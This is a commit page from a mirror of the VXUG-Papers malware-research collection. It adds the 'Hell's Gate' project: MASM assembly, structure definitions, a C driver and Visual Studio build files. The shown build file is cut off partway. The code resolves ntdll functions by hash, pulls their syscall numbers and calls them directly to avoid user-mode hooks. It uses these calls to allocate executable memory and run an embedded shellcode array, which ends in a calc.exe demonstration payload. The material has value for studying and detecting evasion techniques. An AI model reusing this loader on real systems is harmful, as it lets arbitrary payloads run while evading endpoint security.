tcp.direct
/
VXUG-Papers
mirror of https://github.com/vxunderground/VXUG-Papers.git
13
0
Fork 0
Code Issues Releases Wiki Activity

Add files via upload

Browse Source
pull/1/head
vxunderground 3 years ago committed by GitHub
parent ad3ed5a13f
commit a6dbe47b59
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
24 changed files with 3744 additions and 0 deletions
Show Stats Download Patch File Download Diff File

262
Hells Gate/Assembly Expansion/HELLSGATE.ASM
Unescape View File

@ -0,0 +1,262 @@
; @file HELLSGATE.ASM
; @data 07-08-2020
; @author Paul Laîné (@am0nsec)
; @version 1.0
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
; @details
; @link https://ntamonsec.blogspot.com/
; @copyright This project has been released under the GNU Public License v3 license.
include HELLSGATE.INC
_DATA segment
extern Shellcode: BYTE
extern ShellcodeLength: QWORD
wSystemCall DWORD 000h
lpAddress QWORD ?
sDataSize QWORD ?
OldProtect QWORD ?
hThreadHandle QWORD ?
VXTable VX_TABLE <>
Timeout LARGE_INTEGER <>
_DATA ends
_TEXT segment
SystemCall PROC
mov r10, rcx
syscall
ret
SystemCall ENDP
HellsGate PROC
_start:
mov r8, gs:[60h] ; Get process environment block (PEB)
cmp [r8].PEB.OSMajorVersion, 0Ah ;
jne _failure ; Jump if not Windows 10
; Get the base address of ntdll
mov r8, [r8].PEB.Ldr ;
mov r8, [r8].PEB_LDR_DATA.InMemoryOrderModuleList.Flink - 10h ; First loaded module: e.g. hellsgate.exe
mov r8, [r8].LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink - 10h ; Second loaded module: e.g. ntdll.dll
mov r8, [r8].LDR_DATA_TABLE_ENTRY.DllBase ; Image base of the module
mov r9, r8 ; Store for later use
; Get module export directory
cmp [r8].IMAGE_DOS_HEADER.e_magic, 5A4Dh ; DOS Header --> MZ
jne _failure ;
mov ebx, [r8].IMAGE_DOS_HEADER.e_lfanew ; RVA of IMAGE_NT_HEADERS64
add r8, rbx ;
cmp [r8].IMAGE_NT_HEADERS64.Signature, 00004550h ; NT Header --> PE00
jne _failure ;
mov ebx, IMAGE_NT_HEADERS64.OptionalHeader ; RVA of IMAGE_OPTIONAL_HEADER64
add r8, rbx ;
cmp [r8].IMAGE_OPTIONAL_HEADER64.Magic, 20bh ; Optional header --> 0x20b
jne _failure ;
lea r8, [r8].IMAGE_OPTIONAL_HEADER64.DataDirectory ; First entry of the DataDirectory array
mov ebx, [r8].IMAGE_DATA_DIRECTORY.VirtualAddress ; RVA of IMAGE_EXPORT_DIRECTORY
mov r8, r9 ; ImageBase
add r8, rbx ; Module + RVA
; Push function hashes
mov VXTable.NtAllocateVirtualMemory.dwHash, 002B73D648h ; DJB2 hash of NtAllocateVirtualMemory
mov VXTable.NtProtectVirtualMemory.dwHash, 00FE950644h ; DJB2 hash of NtProtectVirtualMemory
mov VXTable.NtCreateThreadEx.dwHash, 00B151D7ACh ; DJB2 hash of NtCreateThreadEx
mov VXTable.NtWaitForSingleObject.dwHash, 0091F4EA38h ; DJB2 hash of NtWaitForSingleObject
xor r15, r15 ; Clean R15 register
mov r15b, 4h ; Move to R15 number of functions to find
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNames ; Address of the function name
mov r12, r9 ; Function name RVA
add r12, rbx ; ImageBase + RVA
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions ; Address of function pointers
mov r13, r9 ;
add r13, rbx ;
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals ; Address of function ordinals
mov r14, r9 ;
add r14, rbx ;
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Total number of named functions
dec ecx
;-----------------------------------------------------------------------------
; Find function ordinal index w/ function name hash
;-----------------------------------------------------------------------------
_parse_functions_name:
mov rbx, 4h ; sizeof(DWORD)
imul rbx, rcx ; siezof(DWORD) * RCX
mov esi, [r12 + rbx] ; Function RVA
add rsi, r9 ; Function RVA + ImageBase
mov r10d, 5381h ; hash = 0x5381
_djb2:
mov r11d, r10d ; Store original hash value for later
shl r10d, 5 ; hash << 5
add r10d, r11d ; (hash << 5) + hash
xor r11d, r11d ; Clean temporary hash value
mov r11b, byte ptr [rsi] ; Get ASCII char
add r10d, r11d ; ((hash << 5) + hash) + char
inc rsi ; Next string char
cmp byte ptr [rsi], 00h ; End of string
jne _djb2 ;
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
xor r10d, [rax].VX_TABLE_ENTRY.dwHash ; Check if function has been found
jz _get_function_address ;
loop _parse_functions_name ;
;-----------------------------------------------------------------------------
; Find the function address w/ function ordinal
;-----------------------------------------------------------------------------
_get_function_address:
mov rax, 2h ; sizeof(WORD)
imul rax, rcx ; sizeof(WORD) * RCX
mov ax, [r14 + rax] ; AX = function ordinal
imul rax, 4 ; sizeof(DWORD) * ordinal
mov eax, [r13 + rax] ; RVA of function
mov rbx, r9 ; RBX = ImageBase
add rbx, rax ; RBX = address of function
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
mov [rax].VX_TABLE_ENTRY.pAddress, rbx ;
;-----------------------------------------------------------------------------
; Find the function system call w/ function address
;-----------------------------------------------------------------------------
_get_function_syscall:
inc rbx
cmp byte ptr [rbx], 00C3h ; Check if RET
je _failure ;
cmp word ptr [rbx], 050Fh ; Check if syscall
jne _get_function_syscall ;
sub rbx, 0Eh ; Address of system call
mov cx, word ptr [rbx] ; CX = system call
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
mov [rax].VX_TABLE_ENTRY.wSystemCall, cx ;
_reset_loop:
; Move to the next function
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Reset counter
dec ecx ;
dec r15 ; Check if all function have been found
jnz _parse_functions_name ;
;-----------------------------------------------------------------------------
; Execute the payload
;-----------------------------------------------------------------------------
_payload:
; Initialise variables
mov r10, ShellcodeLength ;
mov sDataSize, r10 ; Store shellcode length
mov lpAddress, 0h ;
; Execute NtAllocateVirtualMemory
mov ax, VXTable.NtAllocateVirtualMemory.wSystemCall ;
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
lea rdx, lpAddress ; BaseAddress
xor r8, r8 ; ZeroBits
lea r9, sDataSize ; RegionSize
mov qword ptr [rsp + 20h], 3000h ; AllocationType
mov qword ptr [rsp + 28h], 4 ; Protect
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Copy shellcode
cld ; Clear direction flag == forward copy
lea rsi, Shellcode ; Origin
mov rdi, lpAddress ; Destination
mov rcx, ShellcodeLength ; Size of shellcode
rep movsb ; Copy byte until RCX = 0
; Execute NtProtectVirtualMemory
mov ax, VXTable.NtProtectVirtualMemory.wSystemCall ;
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
lea rdx, lpAddress ; BaseAddress
lea r8, sDataSize ; NumberOfBytesToProtect
mov r9d, 20h ; NewAccessProtection
mov OldProtect, 00h ;
lea r11, OldProtect ;
mov qword ptr [rsp + 20h], r11 ; OldAccessProtection
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Execute NtCreateThreadEx
mov ax, VXTable.NtCreateThreadEx.wSystemCall
mov hThreadHandle, 0 ;
lea rcx, hThreadHandle ; hThread
mov rdx, 1FFFFFh ; DesiredAccess
xor r8, r8 ; ObjectAttributes
mov r9, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
mov r10, lpAddress ;
mov qword ptr [rsp + 20h], r10 ; lpStartAddress
mov qword ptr [rsp + 28h], 00h ; lpParameter
mov qword ptr [rsp + 30h], 00h ; Flags
mov qword ptr [rsp + 38h], 00h ; StackZeroBits
mov qword ptr [rsp + 40h], 00h ; SizeOfStackCommit
mov qword ptr [rsp + 48h], 00h ; SizeOfStackReserve
mov qword ptr [rsp + 50h], 00h ; lpBytesBuffer
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Execute NtWaitForSingleObject
mov ax, VXTable.NtWaitForSingleObject.wSystemCall ;
mov rcx, hThreadHandle ; ObjectHandle
xor rdx, rdx ; Alertable
mov Timeout, 0FFFFFFFFFF676980h ; TimeOut
lea r8, Timeout ;
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
;-----------------------------------------------------------------------------
; Successfully execution of the function
;-----------------------------------------------------------------------------
_success:
mov rax, 1
ret
;-----------------------------------------------------------------------------
; In case something goes wrong
;-----------------------------------------------------------------------------
_failure:
xor rax, rax
ret
HellsGate ENDP
_TEXT ends
; end of file
end

285
Hells Gate/Assembly Expansion/HELLSGATE.INC
Unescape View File

@ -0,0 +1,285 @@
; @file HELLSGATE.INC
; @data 07-08-2020
; @author Paul Laîné (@am0nsec)
; @version 1.0
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
; @details
; @link https://ntamonsec.blogspot.com/
; @copyright This project has been released under the GNU Public License v3 license.
VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY
VXTableSize EQU SIZEOF VX_TABLE
VX_TABLE_ENTRY struct
pAddress QWORD ? ; 0x0000
dwHash DWORD ? ; 0x0008
wSystemCall WORD ? ; 0x000C
BYTE 2 dup(?) ; padding
VX_TABLE_ENTRY ends
VX_TABLE struct
NtAllocateVirtualMemory VX_TABLE_ENTRY <> ; 0x0000
NtProtectVirtualMemory VX_TABLE_ENTRY <> ; 0x0010
NtCreateThreadEx VX_TABLE_ENTRY <> ; 0x0020
NtWaitForSingleObject VX_TABLE_ENTRY <> ; 0x0030
VX_TABLE ends
LARGE_INTEGER struct
LowPart DWORD ? ; 0x0000
HighPart DWORD ? ; 0x0004
LARGE_INTEGER ends
ULARGE_INTEGER struct
LowPart DWORD ? ; 0x0000
HighPart DWORD ? ; 0x0004
ULARGE_INTEGER ends
UNICODE_STRING struct
_Length WORD ? ; 0x0000
MaximumLength WORD ? ; 0x0002
BYTE 4 dup(?) ; padding
Buffer QWORD ? ; 0x0008
UNICODE_STRING ends
LIST_ENTRY struct
Flink QWORD ? ; 0x0000
BLink QWORD ? ; 0x0008
LIST_ENTRY ends
PEB struct
InheritedAddressSpace BYTE ? ; 0x0000
ReadImageFileExecOptions BYTE ? ; 0x0001
BeingDebugged BYTE ? ; 0x0002
BitField BYTE ? ; 0x0003
Padding0 BYTE 4 dup(?) ; 0x0004
Mutant QWORD ? ; 0x0008
ImageBaseAddress QWORD ? ; 0x0010
Ldr QWORD ? ; 0x0018
ProcessParameters QWORD ? ; 0x0020
SubSystemData QWORD ? ; 0x0028
ProcessHeap QWORD ? ; 0x0030
FastPebLock QWORD ? ; 0x0038
AtlThunkSListPtr QWORD ? ; 0x0040
IFEOKey QWORD ? ; 0x0048
CrossProcessFlags DWORD ? ; 0x0050
Padding1 BYTE 4 dup(?) ; 0x0054
UserSharedInfoPtr QWORD ? ; 0x0058
SystemReserved DWORD ? ; 0x0060
AtlThunkSListPtr32 DWORD ? ; 0x0064
ApiSetMap QWORD ? ; 0x0068
TlsExpansionCounter DWORD ? ; 0x0070
Padding2 BYTE 4 dup(?) ; 0x0074
TlsBitmap QWORD ? ; 0x0078
TlsBitmapBits DWORD 2 dup(?) ; 0x0080
ReadOnlySharedMemoryBase QWORD ? ; 0x0088
SharedData QWORD ? ; 0x0090
ReadOnlyStaticServerData QWORD ? ; 0x0098
AnsiCodePageData QWORD ? ; 0x00A0
OemCodePageData QWORD ? ; 0x00A8
UnicodeCaseTableData QWORD ? ; 0x00B0
NumberOfProcessors DWORD ? ; 0x00B9
NtGlobalFlag DWORD ? ; 0x00BC
CriticalSectionTimeout LARGE_INTEGER <> ; 0x00C0
HeapSegmentReserve QWORD ? ; 0x00C8
HeapSegmentCommit QWORD ? ; 0x00D0
HeapDeCommitTotalFreeThreshold QWORD ? ; 0x00D8
HeapDeCommitFreeBlockThreshold QWORD ? ; 0x00E0
NumberOfHeaps DWORD ? ; 0x00E8
MaximumNumberOfHeaps DWORD ? ; 0x00EC
ProcessHeaps QWORD ? ; 0x00F0
GdiSharedHandleTable QWORD ? ; 0x00F8
ProcessStarterHelper QWORD ? ; 0x0100
GdiDCAttributeList DWORD ? ; 0x0108
Padding3 BYTE 4 dup(?) ; 0x010C
LoaderLock QWORD ? ; 0x0110
OSMajorVersion DWORD ? ; 0x0118
OSMinorVersion DWORD ? ; 0x011C
OSBuildNumber WORD ? ; 0x0120
OSCSDVersion WORD ? ; 0x0122
OSPlatformId DWORD ? ; 0x0124
ImageSubsystem DWORD ? ; 0x0128
ImageSubsystemMajorVersion DWORD ? ; 0x012C
ImageSubsystemMinorVersion DWORD ? ; 0x0130
Padding4 BYTE 4 dup(?) ; 0x0134
ActiveProcessAffinityMask QWORD ? ; 0x0138
GdiHandleBuffer DWORD 60 dup(?) ; 0x0140
PostProcessInitRoutine QWORD ? ; 0x0230
TlsExpansionBitmap QWORD ? ; 0x0238
TlsExpansionBitmapBits DWORD 32 dup(?) ; 0x0240
SessionId DWORD ? ; 0x02C0
Padding5 BYTE 4 dup(?) ; 0x02C4
AppCompatFlags ULARGE_INTEGER <> ; 0x02C8
AppCompatFlagsUser ULARGE_INTEGER <> ; 0x02D0
pShimData QWORD ? ; 0x02D8
AppCompatInfo QWORD ? ; 0x02E0
CSDVersion UNICODE_STRING <> ; 0x02E8
ActivationContextData QWORD ? ; 0x02F8
ProcessAssemblyStorageMap QWORD ? ; 0x0300
SystemDefaultActivationContextData QWORD ? ; 0x0308
SystemAssemblyStorageMap QWORD ? ; 0x0310
MinimumStackCommit QWORD ? ; 0x0318
SparePointers QWORD 4 dup(?) ; 0x0320
SpareUlongs DWORD 5 dup(?) ; 0x0340
BYTE 4 dup(?)
WerRegistrationData QWORD ? ; 0x0358
WerShipAssertPtr QWORD ? ; 0x0360
pUnused QWORD ? ; 0x0368
pImageHeaderHash QWORD ? ; 0x0370
TracingFlags DWORD ? ; 0x0378
Padding6 BYTE 4 dup(?) ; 0x037c
CsrServerReadOnlySharedMemoryBase QWORD ? ; 0x0380
TppWorkerpListLock QWORD ? ; 0x0388
TppWorkerpList LIST_ENTRY <> ; 0x0390
WaitOnAddressHashTable QWORD 128 dup(?) ; 0x03A0
TelemetryCoverageHeader QWORD ? ; 0x07A0
CloudFileFlags DWORD ? ; 0x07A8
CloudFileDiagFlags DWORD ? ; 0x07AC
PlaceholderCompatibilityMode BYTE ? ; 0x07B0
PlaceholderCompatibilityModeReserved BYTE 7 dup(?) ; 0x07B1
LeapSecondData QWORD ? ; 0x07B8
LeapSecondFlags DWORD ? ; 0x07c0
NtGlobalFlag2 DWORD ? ; 0x07c4
PEB ends
PEB_LDR_DATA struct
_Length DWORD ? ; 0x0000
Initialized BYTE ? ; 0x0004
BYTE 3 dup(?) ; padding
SsHandle QWORD ? ; 0x0008
InLoadOrderModuleList LIST_ENTRY <> ; 0x0010
InMemoryOrderModuleList LIST_ENTRY <> ; 0x0020
InInitializationOrderModuleList LIST_ENTRY <> ; 0x0030
EntryInProgress QWORD ? ; 0x0040
ShutdownInProgress BYTE ? ; 0x0048
BYTE 7 dup(?) ; padding
ShutdownThreadId QWORD ? ; 0x0050
PEB_LDR_DATA ends
RTL_BALANCED_NODE struct
_Dummy BYTE 24 dup(?)
RTL_BALANCED_NODE ends
LDR_DATA_TABLE_ENTRY struct
InLoadOrderLinks LIST_ENTRY <> ; 0x0000
InMemoryOrderLinks LIST_ENTRY <> ; 0x0010
InInitializationOrderLinks LIST_ENTRY <> ; 0x0020
DllBase QWORD ? ; 0x0030
EntryPoint QWORD ? ; 0x0038
SizeOfImage DWORD ? ; 0x0040
BYTE 4 dup(?) ; padding
FullDllName UNICODE_STRING <> ; 0x0048
BaseDllName UNICODE_STRING <> ; 0x0058
FlagGroup BYTE 4 dup(?) ; 0x0068
ObsoleteLoadCount WORD ? ; 0x006C
TlsIndex WORD ? ; 0x006E
HashLinks LIST_ENTRY <> ; 0x0070
TimeDateStamp DWORD ? ; 0x0080
BYTE 4 dup(?) ; padding
EntryPointActivationContext QWORD ? ; 0x0088
_Lock QWORD ? ; 0x0090
DdagNode QWORD ? ; 0x0098
NodeModuleLink LIST_ENTRY <> ; 0x00A0
LoadContext QWORD ? ; 0x00B0
ParentDllBase QWORD ? ; 0x00B8
SwitchBackContext QWORD ? ; 0x00C0
BaseAddressIndexNode RTL_BALANCED_NODE <> ; 0x00C8
MappingInfoIndexNode RTL_BALANCED_NODE <> ; 0x00E0
OriginalBase QWORD ? ; 0x00F8
LoadTime LARGE_INTEGER <> ; 0x0100
BaseNameHashValue DWORD ? ; 0x0108
LoadReason DWORD ? ; 0x010C
ImplicitPathOptions DWORD ? ; 0x0110
ReferenceCount DWORD ? ; 0x0114
DependentLoadFlags DWORD ? ; 0x0118
SigningLevel BYTE ? ; 0x011C
LDR_DATA_TABLE_ENTRY ends
IMAGE_DOS_HEADER struct
e_magic WORD ? ; 0x0000
e_cblp WORD ? ; 0x0002
e_cp WORD ? ; 0x0004
e_crlc WORD ? ; 0x0006
e_cparhdr WORD ? ; 0x0008
e_minalloc WORD ? ; 0x000A
e_maxalloc WORD ? ; 0x000C
e_ss WORD ? ; 0x000E
e_sp WORD ? ; 0x0010
e_csum WORD ? ; 0x0012
e_ip WORD ? ; 0x0014
e_cs WORD ? ; 0x0016
e_lfarlc WORD ? ; 0x0018
e_ovno WORD ? ; 0x001A
e_res WORD 4 dup(?) ; 0x001C
e_oemid WORD ? ; 0x0024
e_oeminfo WORD ? ; 0x0026
e_res2 WORD 10 dup(?) ; 0x0028
e_lfanew DWORD ? ; 0x003C
IMAGE_DOS_HEADER ends
IMAGE_FILE_HEADER struct
Machine WORD ? ; 0x0000
NumberOfSections WORD ? ; 0x0002
TimeDateStamp DWORD ? ; 0x0004
PointerToSymbolTable DWORD ? ; 0x0008
NumberOfSymbols DWORD ? ; 0x000c
SizeOfOptionalHeader WORD ? ; 0x0010
Characteristics WORD ? ; 0x0012
IMAGE_FILE_HEADER ends
IMAGE_DATA_DIRECTORY struct
VirtualAddress DWORD ? ; 0x0000
_Size DWORD ? ; 0x0004
IMAGE_DATA_DIRECTORY ends
IMAGE_OPTIONAL_HEADER64 struct
Magic WORD ? ; 0x0000
MajorLinkerVersion BYTE ? ; 0x0002
MinorLinkerVersion BYTE ? ; 0x0003
SizeOfCode DWORD ? ; 0x0004
SizeOfInitializedData DWORD ? ; 0x0008
SizeOfUninitializedData DWORD ? ; 0x000C
AddressOfEntryPoint DWORD ? ; 0x0010
BaseOfCode DWORD ? ; 0x0014
ImageBase QWORD ? ; 0x0018
SectionAlignment DWORD ? ; 0x0020
FileAlignment DWORD ? ; 0x0024
MajorOperatingSystemVersion WORD ? ; 0x0028
MinorOperatingSystemVersion WORD ? ; 0x002a
MajorImageVersion WORD ? ; 0x002C
MinorImageVersion WORD ? ; 0x002E
MajorSubsystemVersion WORD ? ; 0x0030
MinorSubsystemVersion WORD ? ; 0x0032
Win32VersionValue DWORD ? ; 0x0034
SizeOfImage DWORD ? ; 0x0038
SizeOfHeaders DWORD ? ; 0x003c
CheckSum DWORD ? ; 0x0040
Subsystem WORD ? ; 0x0044
DllCharacteristics WORD ? ; 0x0046
SizeOfStackReserve QWORD ? ; 0x0048
SizeOfStackCommit QWORD ? ; 0x0050
SizeOfHeapReserve QWORD ? ; 0x0058
SizeOfHeapCommit QWORD ? ; 0x0060
LoaderFlags DWORD ? ; 0x0068
NumberOfRvaAndSizes DWORD ? ; 0x006C
DataDirectory IMAGE_DATA_DIRECTORY 16 dup(<>) ; 0x0070
IMAGE_OPTIONAL_HEADER64 ends
IMAGE_NT_HEADERS64 struct
Signature DWORD ? ; 0x0000
FileHeader IMAGE_FILE_HEADER <> ; 0x0004
OptionalHeader IMAGE_OPTIONAL_HEADER64 <> ; 0x0018
IMAGE_NT_HEADERS64 ends
IMAGE_EXPORT_DIRECTORY struct
Characteristics DWORD ? ; 0x0000
TimeDateStamp DWORD ? ; 0x0004
MajorVersion WORD ? ; 0x0008
MinorVersion WORD ? ; 0x000A
_Name DWORD ? ; 0x000C
Base DWORD ? ; 0x0010
NumberOfFunctions DWORD ? ; 0x0014
NumberOfNames DWORD ? ; 0x0018
AddressOfFunctions DWORD ? ; 0x001C
AddressOfNames DWORD ? ; 0x0020
AddressOfNameOrdinals DWORD ? ; 0x0024
IMAGE_EXPORT_DIRECTORY ends

42
Hells Gate/Assembly Expansion/main.c
Unescape View File

@ -0,0 +1,42 @@
/**
* @file main.c
* @data 07-08-2020
* @author Paul Laîné(@am0nsec)
* @version 1.0
* @brief Dynamically extractingand invoking syscalls from in - memory modules.
* @details
* @link https ://ntamonsec.blogspot.com/
* @copyright This project has been released under the GNU Public License v3 license.
*/
#include <Windows.h>
unsigned char Shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
DWORD ShellcodeLength = sizeof(Shellcode);
extern BOOL HellsGate(void);
INT wmain() {
BOOL a = HellsGate();
}

31
Hells Gate/C Implementation/HellsGate.sln
Unescape View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30114.105
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
EndGlobalSection
EndGlobal

161
Hells Gate/C Implementation/HellsGate/HellsGate.vcxproj
Unescape View File

@ -0,0 +1,161 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>
<RootNamespace>HellsGate</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
